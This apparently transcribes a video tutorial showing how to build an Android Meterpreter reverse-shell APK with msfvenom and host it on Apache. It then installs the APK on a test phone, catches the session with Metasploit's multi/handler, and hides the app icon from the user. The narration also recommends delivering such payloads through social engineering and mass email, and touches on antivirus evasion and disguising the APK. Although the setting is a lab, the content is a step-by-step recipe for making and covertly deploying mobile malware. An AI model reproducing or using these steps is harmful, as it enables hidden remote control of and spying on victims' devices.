So on the left side of the screen, I have Kali Linux running, and we can actually go into terminal. And once we're in terminal, we can zoom it a little, and we can enter IP ADDR. So with this, we can actually see the IP address of 192.168.1.11. So this is the IP address of the attacker server. So this is also the server where we'll be hosting the listening services coming from Metasploit. And of course, on the right side of the screen, I actually have an Android mobile device running. So this is running on the Oracle VirtualBox. So this is an Android that is running over here. And of course, we're able to surf into the net. And we can actually open up browsers, and we can actually go into the internet and be able to search up on information. Say, for example, I enter Loy Liang Yang, we can see the website, the YouTube channel, and so on. So there is internet connection. So moving back into Kali Linux, we actually have to use Msfvenom. So you can actually enter Msfvenom. Then, of course, it will tell you all the parameters and options. And it's really important, especially when you're learning about cybersecurity, to try out all the tools, try out all the different parameters and options, like the changes in a NOP slab, for example, over here that you can see on the length of the NOP slab. And again, all these are actually being used to help you bypass a lot of these security mechanisms coming from the antivirus servers and so on. So really important way for you to really think about cybersecurity in a more advanced level. And a lot of the advanced level actually requires a lot of trying out tests and errors, especially on the fly, trying to find out new ways of bypassing many of these security fences. So of course, moving forward, what we'll do is we actually enter Msfvenom, and we'll actually enter -p followed by Android Meterpreter followed by reverse_TCP. So this would be a reverse shell into the Kali Linux listening server. And of course, we can go into lhost equal 192.168.1.11. So this is the listening server IP address that we're using, followed by lport. So we can say 9999. And of course, we can also do a R, and then we have to output the file into, say, for example, /. And we can actually put it and call it mobile app.apk and hit enter on that. So this would generate the file. So as you can see on the left side, the file is being generated by Msfvenom. So once you have the file, you have to service it and relay it over into the mobile application. And a lot of times, a lot of these payloads are actually being relayed using web application servers, using social engineering attacks, using malicious emails, and so on. So a lot of times, all these payloads and deliveries are actually used using social engineering through mass email sending and so on. So usually that's the case in a lot of the attacks that are happening in the industry. And in fact, in the industry, most of the time, 99% of the time, the attacks are going after vulnerabilities that are already being available for the past many years, instead of the zero-day attacks. And of course, zero-day attacks are highly novel, but the generation and the creation of zero-day vulnerabilities and exploits are very challenging. So anyway, moving forward, so what we'll do is we can actually go ahead and go into Msfconsole. So this will start up the Metasploit framework. And once we are in the Metasploit framework, what we'll do is we'll have to start up the server. So of course, once we start up the server, this is the part where we will actually host the listening server. And once we host the listening server, we'll be able to get ready for any connections coming in. And what we can do is we can actually enter use exploit multi-handler. So once you do that, all you got to do is move forward and look at show options. So you can see what are the options available. So you can also specify the kind of payload that we'll be using in this case. So we can actually go ahead and say that we'll be using the payload. So we can enter set payload as Android Meterpreter reverse_TCP. And we can enter show options. And we have to set the lhost as 192.168.1.11. So this is the Kali Linux IP address. And once you have all this information being set up, you can actually go and enter exploit. So this would actually start hosting the server. So we can open terminal again. So now what we got to do is actually transfer the file that we've created over here, the mobile app APK, and we got to transfer it into the mobile application. So of course, one of the easiest ways is actually start up your own web application server, or you can host it on like Google Cloud, Microsoft Azure, OneDrive, and so on. So those are other ways of actually sharing those malicious payloads over the internet. So these are what hackers are doing right now, because there are a lot of ways that you can actually do the delivery of it. So what we do is go into etc init.d followed by Apache. And of course we got Apache 2, and then we can enter start, make sure the service is started, and of course we'll be prompted for the password of the administrator, so go ahead and key that in. So now we have the web application server running. We can actually move the file over, so we can enter move mobile app apk to var www html. So this would actually move the file. So we gotta do su, so super user or sudo. So of course we got to key in the password for the user that is currently logged in as an administrator. So this would move the file, so we can cd into var www html, enter ls-l. So we can see that we got the mobile app.apk that's been created and is being hosted. So with that in mind, we can actually go into the mobile application that we have over here. So we got to go into the link. And from the link, we can actually enter 192.168.1.11 followed by mobile app.apk. Hit enter on that. That would start the download. And once the download completes, we can actually open up the APK file. And of course, over here, we have the file being downloaded. So we can go ahead and open that up. So of course, a lot of times you can actually disguise and do a lot of changes to the APK file that we'll discuss later on other tutorials, how you can actually either embed a payload, or you can change some of the settings and configurations so that it masks its identity, it masks its intention as part of the installation into the mobile device. So once we have all this information, go ahead and click install. And of course, it was install the main activity into your mobile application. So again, the mobile application can be any Android devices. And if we have the opportunity, we'll also discuss about some of the iOS that we have a vulnerability on and how we can install all those applications onto iOS. So go ahead and hit open on that. And of course, once you hit open on that, going back into Kernel Linux, we can actually see that we can go back into the mobile app. And over here, we can see the main activity that's been created. So we can go ahead and click on that. So we set the L port incorrectly, so we have to set the L port correctly. So set L port as 9999. Hit enter on that. Go ahead and hit exploit. So we have the Meterpreter session open up now because it's open up on the mobile application. So of course, once we have the information, we can enter sysinfo. So we can actually see the computer, the operating system type, and so on. So one really cool trick is actually to look at main activity. So over here on the mobile device, we can see main activity. And all you got to do is actually enter hide app_icon. And once you do that, the activity would actually try to hide the mobile application from appearing on your catalog. So over here, what happens is that when we go back here, we can actually see the mobile app being hidden. And what happens is that you can actually go under settings. And once you're in settings, you can go under applications or apps. And then you will be able to see the apps that are running in your environment. And of course, if you look at the running services, we can see main activity being running. So of course, this is the only way the user could detect that the mobile application is running. So in subsequent members-only tutorial, we'll be looking at how you could actually configure the APK file, change the app icon, change the title, push scripts directly alongside the installation of the mobile application, and do a lot of automation on top of that. So again, I hope you've learned something valuable in today's tutorial. If you have any questions, feel free to leave a comment below, and I'll try my best to answer any of those questions. And thank you so much once again for watching.